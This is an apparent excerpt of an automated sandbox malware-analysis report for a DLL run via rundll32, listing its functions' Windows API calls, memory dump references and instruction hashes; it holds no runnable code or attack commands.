                                                                                                                      • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                      • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                      • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                      • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                      • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                      • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                      • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      • Opcode ID: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction ID: 16a76d7c805c79391281f5fd2ee222f5103365245b1589172f68e38ef912b2cf
                                                                                                                      • Opcode Fuzzy Hash: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction Fuzzy Hash: B62127755002556FDB21DFB49C81BAEB7F8DF59241FA14066F984D7240DB709A40CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
                                                                                                                      • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                      • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                      • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                      • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                      • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                      • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      • Opcode ID: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction ID: 7ba363369691fc6b3f3751fa7a143ae8cdd8f79096e01733c6a63758ec2ecc69
                                                                                                                      • Opcode Fuzzy Hash: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction Fuzzy Hash: A601C072500219FBEB00DF648D85FAF73BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                      • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

